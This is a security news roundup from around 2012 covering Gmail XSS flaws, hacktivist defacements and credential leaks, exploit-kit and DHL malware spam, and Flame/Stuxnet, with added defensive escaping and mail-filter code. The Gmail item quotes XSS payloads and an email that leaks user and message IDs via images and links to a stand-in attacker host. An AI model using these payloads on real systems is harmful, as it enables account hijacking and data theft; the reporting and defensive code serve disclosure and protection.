Google patched Persistent XSS vulnerabilities in Gmail


Security researcher Nils Junemann discovered persistent cross-site scripting (XSS) vulnerabilities in Gmail and notified Google a few months ago; Google has now patched the vulnerabilities.

According to his blog post, Junemann found three different XSS vulnerabilities in Gmail. The first security flaw is "Persistent DOM XSS (innerHTML) in Gmail's mobile view":

An incoming mail containing <img src=x onerror=prompt(1)> in the subject, when forwarded to another user, led to XSS.

The second one is a very simple non-persistent XSS in Gmail's mobile view:
https://mail.google.com/mail/mu/#cv/search/%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E/foobar

The third security issue is a very interesting persistent XSS. He discovered that there was a way for an attacker to get access to several key pieces of information in the URLs that Gmail generates when it displays a message to a user.

When a message is displayed directly, rather than as part of a user's inbox, it contains both a static user ID and an identifier for the individual message. Those values shouldn't be available to an attacker, but Juenemann found that he could get them through referrer leaks.

"An attacker doesn't know the ik and the message id. Without both values it's not possible to generate the special URL. But it's easy to get both values through referer leaking.

We have to send to our victim an HTML e-mail with that content:
<img src="https://attackershost.com/1x1.gif">
<a href="https://attackershost.com/gmailxss">Click here to have fun</a>
<script>alert(/xss/)</script>
When the user opens the email message, the GIF image will send the user ID and message ID to the attacker's server. The second URL also will leak that data if the user clicks on it. The script will then display a Javascript alert, and that's the attacker's code running in the context of Gmail.
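The first bug above is the classic innerHTML pattern: an untrusted mail subject is spliced into markup as-is, so the browser parses the attacker's tag and runs its event handler. The following is an added example, not Gmail's code or the researcher's, that simulates that template as string building (which is what assigning to innerHTML amounts to) beside the output-encoding fix. The subject payload is the one quoted in the post; the template markup, function names and the `injectsTag` check are assumptions made for this illustration. The same encoding neutralises the `"><img ...>` payload of the second (non-persistent) bug, since it also depends on raw `<` and `"` reaching the HTML parser.

```javascript
// Added example, not Gmail's code: innerHTML-style rendering of an untrusted
// subject beside the output-encoded fix. Template and names are assumptions.
const SAMPLE_SUBJECT = "<img src=x onerror=prompt(1)>"; // payload quoted in the post

// Encode the five characters that let text break out of an HTML text node or
// attribute value. Order does not matter because each character maps to one entity.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  })[c]);
}

// Vulnerable: the subject lands in the markup unchanged, so a browser given this
// string via innerHTML parses the <img> element and fires its onerror handler.
function renderSubjectUnsafe(subject) {
  return `<div class="subject">${subject}</div>`;
}

// Fixed: encode before interpolation. In a real page the equivalent is to create the
// element and assign the subject to textContent instead of building HTML.
function renderSubjectSafe(subject) {
  return `<div class="subject">${escapeHtml(subject)}</div>`;
}

// Rough check used here to show the difference: does the fragment contain any tag
// other than the template's own <div>? (A real test would use an HTML parser.)
function injectsTag(html) {
  return /<(?!\/?div\b)[a-z]/i.test(html);
}

// Demonstrate both renderings on the quoted payload.
function demo(subject = SAMPLE_SUBJECT) {
  return {
    unsafe: injectsTag(renderSubjectUnsafe(subject)), // true: tag survives
    safe: injectsTag(renderSubjectSafe(subject)), // false: tag is inert text
    encoded: escapeHtml(subject),
  };
}
```

The encoding step is the whole fix for the two innerHTML bugs; the third bug depends instead on the Referer header carrying the user ID and message ID to a third-party host, which is the leak that a `Referrer-Policy: no-referrer` response header (or `rel="noreferrer"` on outbound links) exists to stop.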

#ProjectWestWind : Team GhostShell hacked Italian Government Sites

A hacker known as Echelon, leader of Team GhostShell, has launched a new campaign called ProjectWestWind, an operation aimed at "extreme-right nationalism and racism" in politics.


“As some of you may know (although not nearly as many as it should be), Europe has these past few years been hit by waves of extreme-right nationalism and racism in its political sphere. This includes nationalist political parties like Hungary's ‘Jobbik’, Italy's ‘Lega Nord’ and Finland’s ‘True Finns’,” Echelon said.

“The parties thrive on ignorance and disappointment, and have risen towards power on the wave that was the 2008 economic crisis - just as the NSDAP did during the 30s.”

The first victims of ProjectWestWind, which targets European governments, are a number of state-owned sites from Italy.

One of the targets is the Comune di San Marzano (sanmarzano-ta.gov.it), the site of which has been defaced to display the hackers’ message. Besides altering the website’s main page, Team GhostShell has also leaked more than 100 usernames and password hashes, including the ones of the administrator.

Another target is IV Circolo C.N.Cesaro (cncesaro.gov.it) from which the hackers have leaked 41 record sets comprising usernames, email addresses, names and password hashes.

primocircolovico.gov.it has been taken offline after the group gained access to its databases, publishing 22 login details and 68 entries from a table named "docent."

Names, usernames, passwords and email addresses have also been stolen from donmilaninapoli.gov.it, istitutodenicola.gov.it, cavaprimocircolo.gov.it and itimarconi.gov.it, all of which have been taken offline.

The Italian government sites haven’t been the only victims of the first phase of ProjectWestWind. The website of the Swedish Vänsterpartiet political party (vansterpartiet.eu) and the one of the Council of Bars and Law Societies of Europe (ccbe.eu) have also been breached. From each of their databases the hackers have made available a handful of login details.

Amazon spam email leads to Blackhole Exploit kit website


Fake Amazon notification mails are hitting inboxes and trying to lure recipients into following links that host the Blackhole Exploit Kit. The email was spotted by GFI researchers.

The mail may look legitimate. The only thing that gives it away at first glance is the fact that multiple email addresses are included in the "To:" field, while the email is personalized for the first recipient only.

The links in the email lead to various legitimate but compromised WordPress domains. Their URLs contain the following section:

/wp-content/themes/twentyten/zone(dot)html

The Blackhole exploit code tries to exploit Adobe Reader, Flash and Java vulnerabilities. If one of the vulnerable applications is installed on your system, the kit will exploit the vulnerability and infect the system.

Intruders break into University of North Florida

The University of North Florida (UNF) has started sending out email notifications to users after learning that a database containing information about people who submitted contracts to live in the UNF residence halls could have been compromised.

UNF has now secured the servers, but an investigation shows the information could have been accessed as early as spring 2011. The potentially compromised sensitive data includes approximately 23,000 names and Social Security numbers of people who submitted a housing contract between 1997 and spring 2011.

The institution has also made available a frequently asked questions (FAQ) page to offer further clarifications on the incident.

To help the potential victims, UNF is covering the cost of an identity protection service for a period of one year, which includes a credit report, daily 3-bureau credit monitoring, identity theft resolution, ExtendCARE and $1 million identity theft insurance.

"Hello Dear" a DHL notification mail leads malware infection



Epic fail: a mail purportedly coming from DHL informs the user that their delivery "Processing complete successfully". The truth is that the mail is not coming from DHL. If you look at the opening words of the mail, you can easily identify it: the mail starts with "Hello Dear".

The spam mail:

Hello Dear,

DHL Express Tracking Notification: Mon, 11 Jun 2012 12:14:55 +0200

Custom Reference: 9057425-HRIEI2E4Q8C
Tracking Number: UT09-2041042911
Pickup Date: Mon, 11 Jun 2012 12:14:55 +0200
Service: AIR/GROUND
Pieces: 2

Mon, 11 Jun 2012 12:14:55 +0200 - Processing complete successfully
PLEASE REFER TO ATTACHED FILE FOR DETAILED INFORMATION.

Shipment status may also be obtained from our Internet site in USA under http://track.dhl-usa.com or Globally under http://www.dhl.com/track

Please do not reply to this email. This is an automated application used only for sending proactive notifications

Thanks in advance,
DHL Express International Inc.

The mail has a zip file attachment which contains malware. Sophos products detect the Windows malware as Troj/Agent-WMO. The attached filename can vary, but takes the form DHL_International_Delivery_Details-[random code].zip.

A typical email has a subject line of "DHL Express Parcel Tracking notification [random code]", "DHL Express Tracking Notification ID [random code]" or "DHL International Notification for shipment [random code]".
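Both lures above come with concrete give-aways: the Amazon mail's links all contain the `/wp-content/themes/twentyten/zone.html` path and the message lists several addresses in "To:", while the DHL mail has a fixed greeting, three known subject prefixes and a predictable attachment name. The following is an added example, not GFI's or Sophos's code, turning those indicators into mail-filter rules and running them over three constructed messages. The rule names, the message record shape, the verdict thresholds and the assumption that "[random code]" is alphanumeric are all choices made for this illustration.

```javascript
// Added example, not the researchers' code: filter rules built from the indicators
// described in the Amazon/Blackhole and DHL spam stories. Samples are constructed.

const RULES = [
  {
    // Path fragment the Amazon lure's links shared (written zone(dot)html in the post).
    name: "blackhole-wp-zone-path",
    test: (m) => m.links.some((u) => /\/wp-content\/themes\/twentyten\/zone\.html/i.test(u)),
  },
  {
    // The lure listed several addresses in To: while personalising for the first one.
    name: "multiple-to-recipients",
    test: (m) => m.to.length > 1,
  },
  {
    // DHL_International_Delivery_Details-[random code].zip; code assumed alphanumeric.
    name: "dhl-attachment-name",
    test: (m) => m.attachments.some((a) => /^DHL_International_Delivery_Details-[A-Za-z0-9_-]+\.zip$/i.test(a)),
  },
  {
    // The three subject prefixes quoted in the DHL story.
    name: "dhl-subject-prefix",
    test: (m) => /^DHL (Express Parcel Tracking notification|Express Tracking Notification ID|International Notification for shipment)\b/i.test(m.subject),
  },
  {
    // The generic greeting that gives the DHL mail away.
    name: "hello-dear-greeting",
    test: (m) => /^\s*Hello Dear\b/i.test(m.body),
  },
];

// Returns the rules a message trips plus a verdict. Thresholds are an assumption:
// one weak indicator alone (e.g. several recipients) only flags, two or more quarantine.
function scoreMessage(m) {
  const hits = RULES.filter((r) => r.test(m)).map((r) => r.name);
  const verdict = hits.length >= 2 ? "quarantine" : hits.length === 1 ? "flag" : "pass";
  return { hits, verdict };
}

// Constructed sample messages (not real captures).
const SAMPLES = {
  amazonLure: {
    subject: "Your Amazon.com order has shipped",
    to: ["alice@example.com", "bob@example.com", "carol@example.com"],
    body: "Dear alice, your order is on its way ...",
    links: ["http://compromised-blog.example/wp-content/themes/twentyten/zone.html"],
    attachments: [],
  },
  dhlLure: {
    subject: "DHL Express Tracking Notification ID 7Q2KX9",
    to: ["alice@example.com"],
    body: "Hello Dear,\n\nDHL Express Tracking Notification ...",
    links: [],
    attachments: ["DHL_International_Delivery_Details-7Q2KX9.zip"],
  },
  legit: {
    subject: "Re: meeting notes",
    to: ["alice@example.com"],
    body: "Hi Alice, the notes are attached.",
    links: ["https://intranet.example/notes"],
    attachments: ["notes.pdf"],
  },
};

// Score every sample; returns { name: { hits, verdict } }.
function runSamples() {
  return Object.fromEntries(Object.entries(SAMPLES).map(([k, m]) => [k, scoreMessage(m)]));
}
```

The rules are deliberately narrow string matches on the indicators the two stories give; in practice they would sit beside attachment detonation and reputation checks rather than replace them, and the URL rule in particular stops working as soon as the kit operators move the landing page.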

Karachi News website hacked by nyro hacker and Army Of Destruction

A hacker called Nyro Hacker broke into Pakistan's premier news web portal, The Karachi News (karachinews.com.pk), and defaced the website.

At the time of writing this article, the website displays an "under construction" message on its main page.

A mirror of the defacement is available at zone-h:
http://arab-zone.net/mirror/107910/karachinews.com.pk/

7 Philippines Govt. Sites hacked to protest against anti-hacking bill


The hacker group called "PrivateX", a coalition of local hacker groups HukbalaHack, Anonymous, PrivateX and Philkers, hacked seven Philippine government websites on Independence Day as a form of protest against the new anti-cybercrime bill.

According to GMA News, the websites affected are the City Government of Mandaluyong's website (mandaluyong.gov.ph), the website of the Office of the Ombudsman (omb.gov.ph) and the Philippine Anti-Piracy Team website (papt.org.ph).

The Philippine Nuclear Research Institute website (pnri.dost.gov.ph), the National Food Authority website (nfa.gov.ph), the Senate Electoral Tribunal website (set.gov.ph) and a Department of Health website (smokefree.gov.ph) have also been breached.

Whenever users access the above-mentioned websites, they are redirected to another page that carries the defacement message of PrivateX.

The hacktivists fear that in its current form, the bill could be used as “a tool of censorship” which could pose a threat to freedom of expression.

"We're not against the government's intention to combat fraudulence, related forms of it and other serious cyber crimes, but we're absolutely against its provision that has something to do with the internet's freedom of expression (sic)," the hackers said on the defacement page.

OpenVPN official site hacked by HCJ


The official website of OpenVPN has been defaced by hackers apparently led by HcJ. OpenVPN is an open source software application that implements virtual private network (VPN) techniques for creating secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities.

The hackers didn't mention the reason for the attack, but they wrote the following message on the defacement page, "No News Is a Good News", along with a "quote of the day" that read:

Don’t be lammer, Leave your computer and enjoy your summer ./ HcJ"

At press time, the OpenVPN.com website had been restored and was back online. A mirror of the defacement is available at Zone-H.

It’s uncertain at this time if the hackers have gained access to information stored in the website’s databases.

The official website of the State of Louisiana hacked by Zer0Pwn

The hacker known as Zer0Pwn has managed to gain unauthorized access to the official website of the State of Louisiana (Louisiana.gov).

The hacker dumped the compromised database on Pastebin. The dump includes emails, passwords, root users and administrator credentials.

http://pastebin.com/Ubg8GnKG

He also claimed that he found an XSS vulnerability in SubjectPlus, a web application used mostly by educational websites. He posted the proof of concept on Pastebin.

Alaska.edu vulnerable to SQL injection


A grey-hat hacker called 'G4mbi7' discovered a SQL injection vulnerability in the Alaska Volcano Observatory website.

The site is vulnerable to blind SQL injection, according to the hacker's report. He found this vulnerability a few months ago.

Since no patch had come from the admin, he decided to inform the admin about the vulnerability and sent a notification with details about it. After a week, the admin patched the vulnerability.

Flame and Stuxnet malware unleashed by same Master


The two infamous malware families Flame and Stuxnet were unleashed by the same master, says Kaspersky Labs, which has discovered an identical piece of code in both worms. What appeared to be two unrelated programs are probably part of the same cyberwar campaign.

Experts spotted the Flame malware last month. Initially they didn't consider the two pieces of malware related, because Stuxnet (and Duqu) were created on the Tilded platform, while Flame was not.

However, as it turns out, researchers have unearthed some previously unknown facts that completely transform the current view of how Stuxnet was created and its link with Flame.

Even though the two viruses are built on completely different platforms and most likely developed independently, they shared key pieces of code during the development process, the security firm explained.

The finding in question relates to "Resource 207," a module found in earlier versions of Stuxnet that bears a "striking resemblance" to Flame, including "names of mutually exclusive objects, the algorithm used to decrypt strings and similar approaches to file naming."

"The new findings that reveal how the teams shared the source code of at least one module in the early stages of development prove that the groups co-operated at least once," wrote Aleksandr Gostev, chief security expert for Russian security company Kaspersky Labs.

More details about the analysis can be found here.